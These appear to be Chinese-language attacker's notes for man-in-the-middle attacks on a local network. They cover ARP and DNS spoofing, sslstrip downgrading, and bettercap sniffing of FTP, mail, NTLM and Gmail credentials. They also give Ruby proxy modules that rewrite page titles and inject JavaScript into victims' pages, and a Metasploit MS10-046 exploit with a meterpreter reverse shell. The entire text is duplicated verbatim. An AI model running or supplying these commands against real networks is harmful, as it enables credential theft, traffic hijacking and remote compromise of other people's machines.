内网劫持命令:
bettercap -X -I eth0 -G 192.168.211.1 -T 192.168.211.137 --dns '/root/桌面/dns.conf'
ettercap -Tq -i eth0 -P dns_spoof -T 192.168.211.137
ipconfig/flushdns 清除缓存
echo 1 > /proc/sys/net/ipv4/ip_forward 启用内核包转发,修改/proc/sys/net/ipv4/ip_forward文件
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 端口转发,10000为sslstrip的监听端口
Ettercap+arpspoof+sslstrip=Bettercap
arpspoof -i eth0 -t 192.168.211.137 192.168.211.1 shell1,ARP欺骗
sslstrip -l 10000 使用sslstrip监听10000端口
//sslstrip -a -k -f 开启sslstrip
ettercap -T -q -i eth0 嗅探得到登陆Gmail邮箱的用户名和密码
第一个//中加上目标主机,第二个//中加上网关路由ip
Bettercap
凭证嗅探器
内置的嗅探器目前能够分析打印如下网络内容:
1.被访问的URLs
2.被访问过的HTTPS主机
3.HTTP发布过的数据
4.HTTP Basic认证以及摘要认证
5.FTP凭证
6.IRC凭证
7.POP, IMAP以及SMTP凭证
8.NTLMv1/v2 ( HTTP, SMB, LDAP等) 凭证
bettercap arp spoofing功能以及它的多个主机发现代理能够将令人烦躁的步骤简化。你只需要启动工具,然后等待它完成工作。
sudo bettercap -X 嗅探器默认的模式,所有解析器启用:
sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS" 启用嗅探器,启用指定解析器
sudo bettercap -X -L 启用嗅探器+所有解析器,此外并解析本地通信
一个模块化的透明代理,可以从使用–proxy参数开始。除非你记录HTTP请求,在默认情况下他不会做任何事。当然你也可以指定一个–proxy-module参数,这样你就可以加载自己的模块,随意操作HTTP流量
sudo bettercap --proxy 默认端口(8080)启用代理,不带任何模块
sudo bettercap --proxy --proxy-port=8081 使用自定义端口启用代理
sudo bettercap --proxy --proxy-module=hack_title.rb 启用代理并加载hack_title.rb模块
sudo bettercap -S NONE --proxy 禁用spoofer并启用代理(独立代理模式)
class HackTitle < Proxy::Module
def on_request( request, response ) # is it a html page?
if response.content_type == 'text/html'
Logger.info "Hacking http://#{request.host}#{request.url} title tag"
# make sure to use sub! or gsub! to update the instance
response.body.sub!( '<title>', '<title> !!! HACKED !!! ' ) end
endend
bettercap内置一个HTTP服务器,允许你从自己的机器上定制内容,而不需要安装配置诸如Apache, nginx 或者lighttpd等软件。
你需要使用proxy module模块:
class InjectJS < Proxy::Module
def on_request( request, response )
# is it a html page?
if response.content_type == 'text/html'
Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
# get the local interface address and HTTPD port
localaddr = Context.get.iface[:ip_saddr]
localport = Context.get.options[:httpd_port]
# inject the js
response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js'
type='text/javascript'></script>" )
end
end
end
接着使用它就能将JS文件注入到HTTP响应中,使用bettercap来管理这个文件
MS10_046
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。受影响的Windows系统如下:
受影响的Windows系统类型
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Server 2008
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2003 SP2
Microsoft Windows 7
sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.211.179
set SRVHOST 192.168.211.179
exploit
bettercap -X -I eth0 -G 192.168.211.1 -T 192.168.211.137 --dns '/root/桌面/dns.conf'
ettercap -Tq -i eth0 -P dns_spoof -T 192.168.211.137
ipconfig/flushdns 清除缓存
echo 1 > /proc/sys/net/ipv4/ip_forward 启用内核包转发,修改/proc/sys/net/ipv4/ip_forward文件
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000 端口转发,10000为sslstrip的监听端口
Ettercap+arpspoof+sslstrip=Bettercap
arpspoof -i eth0 -t 192.168.211.137 192.168.211.1 shell1,ARP欺骗
sslstrip -l 10000 使用sslstrip监听10000端口
//sslstrip -a -k -f 开启sslstrip
ettercap -T -q -i eth0 嗅探得到登陆Gmail邮箱的用户名和密码
第一个//中加上目标主机,第二个//中加上网关路由ip
Bettercap
凭证嗅探器
内置的嗅探器目前能够分析打印如下网络内容:
1.被访问的URLs
2.被访问过的HTTPS主机
3.HTTP发布过的数据
4.HTTP Basic认证以及摘要认证
5.FTP凭证
6.IRC凭证
7.POP, IMAP以及SMTP凭证
8.NTLMv1/v2 ( HTTP, SMB, LDAP等) 凭证
bettercap arp spoofing功能以及它的多个主机发现代理能够将令人烦躁的步骤简化。你只需要启动工具,然后等待它完成工作。
sudo bettercap -X 嗅探器默认的模式,所有解析器启用:
sudo bettercap -X -P "FTP,HTTPAUTH,MAIL,NTLMSS" 启用嗅探器,启用指定解析器
sudo bettercap -X -L 启用嗅探器+所有解析器,此外并解析本地通信
一个模块化的透明代理,可以从使用–proxy参数开始。除非你记录HTTP请求,在默认情况下他不会做任何事。当然你也可以指定一个–proxy-module参数,这样你就可以加载自己的模块,随意操作HTTP流量
sudo bettercap --proxy 默认端口(8080)启用代理,不带任何模块
sudo bettercap --proxy --proxy-port=8081 使用自定义端口启用代理
sudo bettercap --proxy --proxy-module=hack_title.rb 启用代理并加载hack_title.rb模块
sudo bettercap -S NONE --proxy 禁用spoofer并启用代理(独立代理模式)
class HackTitle < Proxy::Module
def on_request( request, response ) # is it a html page?
if response.content_type == 'text/html'
Logger.info "Hacking http://#{request.host}#{request.url} title tag"
# make sure to use sub! or gsub! to update the instance
response.body.sub!( '<title>', '<title> !!! HACKED !!! ' ) end
endend
bettercap内置一个HTTP服务器,允许你从自己的机器上定制内容,而不需要安装配置诸如Apache, nginx 或者lighttpd等软件。
你需要使用proxy module模块:
class InjectJS < Proxy::Module
def on_request( request, response )
# is it a html page?
if response.content_type == 'text/html'
Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
# get the local interface address and HTTPD port
localaddr = Context.get.iface[:ip_saddr]
localport = Context.get.options[:httpd_port]
# inject the js
response.body.sub!( '</title>', "</title><script src='http://#{localaddr}:#{localport}/file.js'
type='text/javascript'></script>" )
end
end
end
接着使用它就能将JS文件注入到HTTP响应中,使用bettercap来管理这个文件
MS10_046
Windows支持使用快捷方式或LNK文件。LNK文件是指向本地文件的引用,点击LNK文件与点击快捷方式所指定的目标具有相同的效果。
Windows没有正确地处理LNK文件,特制的LNK文件可能导致Windows自动执行快捷方式文件所指定的代码。这些代码可能位于USB驱动、本地 或远程文件系统、光驱或其他位置,使用资源管理器查看了LNK文件所在位置就足以触发这个漏洞。默认下Windows启动了自动加载和自动播放功能,因此 在连接可移动设备(如USB闪存)后Windows会自动打开资源管理器。其他显示文件图标的应用也可用作这个漏洞的攻击载体。受影响的Windows系统如下:
受影响的Windows系统类型
Microsoft Windows XP SP3
Microsoft Windows XP SP2
Microsoft Windows Vista SP2
Microsoft Windows Vista SP1
Microsoft Windows Server 2008
Microsoft Windows Server 2008 SP2
Microsoft Windows Server 2008 R2
Microsoft Windows Server 2003 SP2
Microsoft Windows 7
sudo bettercap --httpd --http-path=/path/to/your/js/file/ --proxy --proxy-module=inject.rb
use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.211.179
set SRVHOST 192.168.211.179
exploit